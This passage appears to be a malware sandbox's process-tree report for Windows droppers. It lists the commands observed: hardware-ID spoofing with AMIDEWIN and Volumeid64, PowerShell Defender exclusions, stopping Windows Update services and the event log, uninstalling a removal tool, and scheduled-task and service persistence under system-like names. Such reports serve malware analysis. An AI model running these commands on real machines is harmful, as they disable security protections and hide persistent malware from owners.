                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                                4⤵
                                                                  PID:2808
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    5⤵
                                                                      PID:3188
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4259HP-TRGT28737FA
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:2080
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                                    4⤵
                                                                      PID:2392
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        5⤵
                                                                          PID:2924
                                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6259HP-TRGT28737FU
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:956
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                                        4⤵
                                                                          PID:720
                                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3259HP-TRGT28737DQ
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5116
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                          4⤵
                                                                            PID:3936
                                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7259HP-TRGT28737MST
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:4520
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                            4⤵
                                                                              PID:3572
                                                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:624
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: NJBE-3ROT
                                                                              4⤵
                                                                                PID:4784
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  5⤵
                                                                                    PID:432
                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: NJBE-3ROT
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3496
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: BDZP-PORE
                                                                                  4⤵
                                                                                    PID:3152
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: BDZP-PORE
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5016
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: KKCA-5UZ3
                                                                                    4⤵
                                                                                      PID:988
                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: KKCA-5UZ3
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4328
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: HOUA-6DMC
                                                                                      4⤵
                                                                                        PID:2548
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: HOUA-6DMC
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3596
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: FRMN-91EI
                                                                                        4⤵
                                                                                          PID:3168
                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: FRMN-91EI
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4696
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: CMH3-IBLR
                                                                                          4⤵
                                                                                            PID:3764
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:3380
                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: CMH3-IBLR
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4288
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: FEEJ-E0J4
                                                                                              4⤵
                                                                                                PID:2672
                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: FEEJ-E0J4
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4904
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: NNVU-LJPS
                                                                                                4⤵
                                                                                                  PID:4688
                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: NNVU-LJPS
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4316
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: VZ3J-30JA
                                                                                                  4⤵
                                                                                                    PID:648
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      5⤵
                                                                                                        PID:4804
                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: VZ3J-30JA
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2064
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 21A2-K8VR
                                                                                                      4⤵
                                                                                                        PID:3940
                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 21A2-K8VR
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2244
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 7KF5-72O0
                                                                                                        4⤵
                                                                                                          PID:1768
                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 7KF5-72O0
                                                                                                            5⤵
                                                                                                              PID:3068
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: E7G7-9INI
                                                                                                            4⤵
                                                                                                              PID:2604
                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: E7G7-9INI
                                                                                                                5⤵
                                                                                                                  PID:1700
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 2338-3A9B
                                                                                                                4⤵
                                                                                                                  PID:2928
                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 2338-3A9B
                                                                                                                    5⤵
                                                                                                                      PID:716
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: URM0-CR5E
                                                                                                                    4⤵
                                                                                                                      PID:2900
                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: URM0-CR5E
                                                                                                                        5⤵
                                                                                                                          PID:836
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 7K6H-795A
                                                                                                                        4⤵
                                                                                                                          PID:4952
                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 7K6H-795A
                                                                                                                            5⤵
                                                                                                                              PID:1824
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: VCU1-98F6
                                                                                                                            4⤵
                                                                                                                              PID:3356
                                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: VCU1-98F6
                                                                                                                                5⤵
                                                                                                                                  PID:1220
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 78MF-3TNF
                                                                                                                                4⤵
                                                                                                                                  PID:4724
                                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 78MF-3TNF
                                                                                                                                    5⤵
                                                                                                                                      PID:3248
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: KNJ6-57F5
                                                                                                                                    4⤵
                                                                                                                                      PID:3688
                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: KNJ6-57F5
                                                                                                                                        5⤵
                                                                                                                                          PID:1292
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: EHOE-H5LZ
                                                                                                                                        4⤵
                                                                                                                                          PID:3264
                                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: EHOE-H5LZ
                                                                                                                                            5⤵
                                                                                                                                              PID:2312
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: PC7L-93VV
                                                                                                                                            4⤵
                                                                                                                                              PID:1980
                                                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: PC7L-93VV
                                                                                                                                                5⤵
                                                                                                                                                  PID:1548
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: LHMG-NPZB
                                                                                                                                                4⤵
                                                                                                                                                  PID:1828
                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: LHMG-NPZB
                                                                                                                                                    5⤵
                                                                                                                                                      PID:5116
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: GOAB-GHZR
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4776
                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: GOAB-GHZR
                                                                                                                                                        5⤵
                                                                                                                                                          PID:828
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: MKDL-E4VV
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1656
                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: MKDL-E4VV
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5280
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3972
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5128
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5176
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5224
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5296
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5344
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5380
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:4248
                                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:2240
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
                                                                                                                                                                            5⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:2904
                                                                                                                                                                            • C:\ChainReview\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                              "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:2440
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\DevManView.exe'
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:740
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:2216
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:2984
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\RuntimeBroker.exe'
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:3988
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\sihost.exe'
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:4520
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Np1XZoUBqP.bat"
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:208
                                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                                    chcp 65001
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:2800
                                                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:1100
                                                                                                                                                                                      • C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe
                                                                                                                                                                                        "C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                        PID:2084
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              PID:3104
                                                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:620
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:216
                                                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:4804
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:1092
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:2768
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:2180
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:3660
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:2440
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:1308
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:4692
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:3152
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:3948
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:3664
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:432
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:2656
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:4092
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:2404
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:3660
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                      PID:2332
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:4412
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1816
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 5 /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1100
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:2780
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:2284
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:544
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3804
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:1264
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
